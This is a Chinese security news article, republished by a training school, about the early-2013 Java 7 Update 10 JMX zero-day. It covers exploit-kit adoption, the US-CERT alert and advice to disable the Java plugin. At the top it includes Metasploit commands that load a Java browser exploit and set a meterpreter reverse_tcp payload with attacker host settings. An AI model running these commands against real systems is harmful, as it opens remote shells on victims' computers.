新年初始,Java驚爆首個0day
11:00 UPDATE: MSF已更新相關(guān)滲透測試模塊
use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192+168+178+26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192+168+178+26 exploit
sysinfo
getuid
詳細鏈接及視頻:
http://eromang+zataz+com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/
新年伊始,人們還沉浸在節(jié)日的歡樂氣氛中,Java又贈送給大家一份豪禮,讓各位歡歡樂樂過個大年。日前,Java又爆了一個新的0day,可能讓攻擊者獲取計算機管理權(quán)限,Java 7 Update 10或更早的版本中存在該漏洞,該漏洞可以允許未經(jīng)身份驗證的遠程攻擊者在受害者系統(tǒng)上執(zhí)行任意代碼,該漏洞首先在‘Malware Don’t Need Coffee’博客上發(fā)表。
目前該漏洞在網(wǎng)絡有兩個EXP,分別出售價格為700美元和1500美元,在去年八月發(fā)現(xiàn)的CVE-2012-4681漏洞中使用的是類似的手法,查看地址。
兩個EXP被黑客用來傳播惡意軟件,國外著名的黑名工具包BlackHole Exploit Kit和Cool Exploit Kit已經(jīng)更新了該EXP。
BlackHole作者Paunch昨天在網(wǎng)絡公布,稱在BlackHole添加該JAVA 0day是送給軟件用戶的新年福利,經(jīng)AlienVault Labs確認,BlackHole工具中使用的EXP證實為Java最新的漏洞。
US-CERT也發(fā)出了VU#625617預警。 未受信任的Java applet可通過調(diào)用setSecurityManager()函數(shù)提升權(quán)限,從而在沒有代碼簽名的情況下獲得 full privileges。
更多截獲到的攻擊樣本請見:
http://malware+dontneedcoffee+com/2013/01/0-day-17u10-spotted-in-while-disable+html
該漏洞影響分布圖如下:
目前建議只能禁用瀏覽器的Java plugin來防范該漏洞攻擊:
How to disable Java in Internet Explorer
How to disable Java in Firefox
How to disable Java in Chrome
文章由鄭州北大青鳥http://www.hnbenent.com/整理,轉(zhuǎn)載請注明!
本文由站河南北大青鳥校區(qū)整編而成,如需了解更多IT資訊類的文章、新聞、課程和學習技巧、就業(yè)案例、招生詳情等問題,可以對在線咨詢老師進行一對一問答!
推薦資訊
- 北大青鳥成就中國IT的“諾貝爾”... 2012-10-12
- 2013年學安卓還可以嗎?... 2013-01-20
- 在河南焦作有北大青鳥嗎... 2022-05-26
- 鄭州北大青鳥:Java Map遍歷速度最... 2012-10-13
- 鄭州Python培訓機構(gòu)值得推薦的學... 2018-10-15
熱點資訊
- 如何從外置硬盤中清除感染病毒... 2017-06-11
- 谷歌瀏覽器用戶密碼安全難保... 2017-06-11
- 網(wǎng)站安全性需要注意哪些方面... 2017-06-11
- Linux中服務器軟件為什么需要編譯... 2017-06-11
- 安卓隱患:防毒軟件無法偵測木馬... 2013-08-06